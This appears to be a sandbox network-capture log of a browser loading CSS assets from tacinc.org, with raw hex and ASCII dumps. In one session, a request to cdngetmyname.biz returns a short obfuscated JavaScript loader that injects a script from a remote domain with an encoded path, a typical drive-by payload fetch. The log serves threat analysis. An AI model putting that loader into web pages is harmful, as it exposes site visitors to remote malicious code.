                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 73 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 70 70 2d 61 6e 69 6d 61 74 65 64 2d 67 72 61 64 69 65 6e 74 2d 62 67 2d 79 65 73 20 2e 70 70 2d 61 6e 69 6d 61 74 65 64 2d 67 72 61 64 69 65 6e 74 2d 62 67 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2e 70 70 2d 61 6e 69 6d 61 74 65 64 2d 67 72 61 64 69 65 6e 74 2d 62 67 2d 79 65 73 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2e 70 70 2d 61 6e 69 6d 61 74 65 64 2d 67 72 61 64 69 65 6e 74 2d 62 67 2d 79 65 73 20 2e 70 70 2d 61 6e 69 6d 61 74 65 64 2d 67 72 61 64 69 65 6e 74 2d 62 67 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 30 30 25 20 34 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 41 6e 69 6d 61 74 65 64
                                                                                                                                                                                                                              Data Ascii: s,.elementor-element.pp-animated-gradient-bg-yes .pp-animated-gradient-bg,.elementor-section.pp-animated-gradient-bg-yes,.elementor-section.pp-animated-gradient-bg-yes .pp-animated-gradient-bg{background-size:400% 400%!important;-webkit-animation:Animated
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 78 74 61 72 65 61 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b 6f 70 61 63 69 74 79 3a 30 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 70 70 2d 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2e 70 6c 61 63 65 68 6f 6c 64 65 72 2d 68 69 64 65 20 69 6e 70 75 74 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 70 70 2d 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2e 70 6c 61 63 65 68 6f 6c 64 65 72 2d 68 69 64 65 20 74 65 78 74 61 72 65 61 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b 6f 70 61 63 69 74 79 3a 30 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 70 70 2d 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2e 70 6c 61 63 65 68 6f 6c 64 65 72 2d 68 69 64 65 20 69 6e 70 75 74 3a 2d 6d 73 2d 69 6e
                                                                                                                                                                                                                              Data Ascii: xtarea::-webkit-input-placeholder{opacity:0;visibility:hidden}.pp-contact-form.placeholder-hide input::-moz-placeholder,.pp-contact-form.placeholder-hide textarea::-moz-placeholder{opacity:0;visibility:hidden}.pp-contact-form.placeholder-hide input:-ms-in
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 6c 65 66 74 20 2e 64 69 76 69 64 65 72 2d 62 6f 72 64 65 72 2d 6c 65 66 74 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 70 70 2d 64 69 76 69 64 65 72 2d 72 69 67 68 74 20 2e 64 69 76 69 64 65 72 2d 62 6f 72 64 65 72 2d 72 69 67 68 74 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 70 70 2d 64 69 76 69 64 65 72 2d 68 6f 72 69 7a 6f 6e 74 61 6c 7b 62 6f 72 64 65 72 3a 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 3a 34 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 38 30 70 78 3b 68 65 69 67 68 74 3a 30 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 64 61 73 68 65 64 7d 2e 70 70 2d 64 69 76 69 64
                                                                                                                                                                                                                              Data Ascii: left .divider-border-left{display:none}.pp-divider-right .divider-border-right{display:none}.pp-divider-horizontal{border:0;border-color:#000;border-bottom-width:4px;border-top-width:0;display:inline-block;width:80px;height:0;border-style:dashed}.pp-divid
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 65 6e 74 65 72 7d 2e 70 70 2d 63 6f 75 6e 74 65 72 2d 6c 61 79 6f 75 74 2d 35 2c 2e 70 70 2d 63 6f 75 6e 74 65 72 2d 6c 61 79 6f 75 74 2d 36 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 70 70 2d 63 6f 75 6e 74 65 72 2d 6c 61 79 6f 75 74 2d 36
                                                                                                                                                                                                                              Data Ascii: enter}.pp-counter-layout-5,.pp-counter-layout-6{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.pp-counter-layout-6
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 70 70 2d 63 6f 75 6e 74 65 72 20 2e 70 70 2d 69 63 6f 6e 2d 6e 75 6d 62 65 72 2d 77 72 61 70 20 2e 70 70 2d 63 6f 75 6e 74 65 72 2d 6e 75 6d 62 65 72 2d 77 72 61 70 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 70 70 2d 63 6f 75 6e 74 65 72 2d 6e 75 6d 62 65 72 7b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 2e 70 70 2d 63 6f 75 6e 74 65 72 2d 6e 75 6d 62 65 72 2d 77 72 61 70 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73
                                                                                                                                                                                                                              Data Ascii: splay:inline-block}.pp-counter .pp-icon-number-wrap .pp-counter-number-wrap{display:inline-block}.pp-counter-number{direction:ltr}.pp-counter-number-wrap{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;jus
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 61 79 3a 69 6e 68 65 72 69 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 69 6e 68 65 72 69 74 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 69 6e 68 65 72 69 74 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 69 6e 68 65 72 69 74 7d 2e 70 70 2d 6c 69 73 74 2d 69 74 65 6d 73 2e 70 70 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 73 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 7d 2e 70 70 2d 6c 69 73 74 2d 69 74 65 6d 73 2e 70 70 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 73 20 6c 69 3a 6e 6f 74 28 3a 6c 61 73 74 2d 63 68 69 6c 64 29 7b 6d 61 72 67 69 6e
                                                                                                                                                                                                                              Data Ascii: ay:inherit;-webkit-box-align:inherit;-ms-flex-align:inherit;align-items:inherit}.pp-list-items.pp-inline-items{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap}.pp-list-items.pp-inline-items li:not(:last-child){margin
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 69 6e 66 6f 2d 62 6f 78 2d 6c 65 66 74 20 2e 70 70 2d 69 6e 66 6f 2d 62 6f 78 20 2e 70 70 2d 69 6e 66 6f 2d 62 6f 78 2d 69 63 6f 6e 2c 2e 70 70 2d 69 6e 66 6f 2d 62 6f 78 2d 6c 65 66 74 20 2e 70 70 2d 69 6e 66 6f 2d 62 6f 78 20 69 6d 67 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 70 70 2d 69 6e 66 6f 2d 62 6f 78 2d 72 69 67 68 74 20 2e 70 70 2d 69 6e 66 6f 2d 62 6f 78 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 65 76 65 72 73 65 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a
                                                                                                                                                                                                                              Data Ascii: info-box-left .pp-info-box .pp-info-box-icon,.pp-info-box-left .pp-info-box img{width:100%}.pp-info-box-right .pp-info-box{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              69192.168.2.649798141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC589OUTGET /wp-content/plugins/elementor/assets/css/widget-heading.min.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f2c-258"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614819
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5cfe96d6b3c-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC607INData Raw: 32 35 38 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 68 65 61 64 69 6e 67 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 68 65 61 64 69 6e 67 2d 74 69 74 6c 65 5b 63 6c 61 73 73 2a 3d 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a 65 2d 5d 3e 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 68 65 61 64 69 6e 67 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 68 65 61 64 69 6e 67 2d 74 69 74 6c 65 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a 65 2d 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 73 69 7a 65
                                                                                                                                                                                                                              Data Ascii: 258/*! elementor - v3.24.0 - 09-10-2024 */.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              70192.168.2.649800141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC593OUTGET /wp-content/plugins/elementor/assets/css/widget-text-editor.min.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f2c-2c0"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 613456
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5d0aa472fd4-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC711INData Raw: 32 63 30 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 74 65 78 74 2d 65 64 69 74 6f 72 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 72 6f 70 2d 63 61 70 2d 76 69 65 77 2d 73 74 61 63 6b 65 64 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 72 6f 70 2d 63 61 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 39 37 32 37 64 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 74 65 78 74 2d 65 64 69 74 6f 72 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 72 6f 70 2d 63 61 70 2d 76 69 65 77 2d 66 72 61 6d 65 64 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 72 6f 70 2d 63 61 70 7b 63 6f 6c 6f 72 3a 23 36 39 37 32
                                                                                                                                                                                                                              Data Ascii: 2c0/*! elementor - v3.24.0 - 09-10-2024 */.elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:#69727d;color:#fff}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap{color:#6972
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              71192.168.2.649799141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC588OUTGET /wp-content/plugins/elementor/assets/css/widget-spacer.min.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f2c-554"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614819
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5d0ee880bb2-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC892INData Raw: 35 35 34 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 70 61 63 65 72 2d 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 76 61 72 28 2d 2d 73 70 61 63 65 72 2d 73 69 7a 65 29 7d 2e 65 2d 63 6f 6e 7b 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 65 2d 63 6f 6e 2d 69 6e 6e 65 72 3e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 73 70 61 63 65 72 2c 2e 65 2d 63 6f 6e 3e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 73 70 61 63 65 72 7b 77 69 64 74 68 3a 76 61 72 28 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 77 69 64 74 68 2c
                                                                                                                                                                                                                              Data Ascii: 554/*! elementor - v3.24.0 - 09-10-2024 */.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC479INData Raw: 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 68 65 69 67 68 74 2c 76 61 72 28 2d 2d 73 70 61 63 65 72 2d 73 69 7a 65 29 29 7d 2e 65 2d 63 6f 6e 2d 69 6e 6e 65 72 3e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 73 70 61 63 65 72 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 65 6d 70 74 79 2c 2e 65 2d 63 6f 6e 3e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 73 70 61 63 65 72 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 65 6d 70 74 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 32 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 32 70 78 7d 2e 65 2d 63 6f 6e 2d 69 6e 6e 65 72 3e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 73 70 61 63 65 72 2e 65 6c 65 6d 65 6e 74
                                                                                                                                                                                                                              Data Ascii: -container-widget-height,var(--spacer-size))}.e-con-inner>.elementor-widget-spacer.elementor-widget-empty,.e-con>.elementor-widget-spacer.elementor-widget-empty{position:relative;min-height:22px;min-width:22px}.e-con-inner>.elementor-widget-spacer.element
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              72192.168.2.64980291.212.166.214431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC347OUTGET /flow.js HTTP/1.1
                                                                                                                                                                                                                              Host: cdngetmyname.biz
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC315INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Content-Length: 233
                                                                                                                                                                                                                              Last-Modified: Wed, 25 Sep 2024 11:25:19 GMT
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              ETag: "66f3f31f-e9"
                                                                                                                                                                                                                              Expires: Thu, 24 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC233INData Raw: 20 3b 28 66 75 6e 63 74 69 6f 6e 28 6c 2c 68 2c 6e 2c 67 2c 6f 29 7b 67 3d 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 68 29 3b 6f 3d 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 68 29 5b 30 5d 3b 67 2e 61 73 79 6e 63 3d 31 3b 67 2e 73 72 63 3d 6e 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 67 2c 6f 29 3b 7d 29 28 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 70 6c 75 72 61 6c 69 73 6d 2e 74 68 65 6d 61 6e 63 61 76 2e 63 6f 6d 2f 30 4d 2f 6d 72 61 76 74 68 63 53 30 37 64 79 66 35 76 76 4b 6a 36 4c 74 33 49 2b 39 75 70 44 47 76 37 71 53 7a 37 6d 71 69 64 65 2f 6f 5a 2b 50 72 51 3d 3d 27 29 3b
                                                                                                                                                                                                                              Data Ascii: ;(function(l,h,n,g,o){g=l.createElement(h);o=l.getElementsByTagName(h)[0];g.async=1;g.src=n;o.parentNode.insertBefore(g,o);})(document,'script','https://pluralism.themancav.com/0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ==');


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              73192.168.2.649805141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC589OUTGET /wp-content/themes/socialdriver/css/fontawesome/css/all.min.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
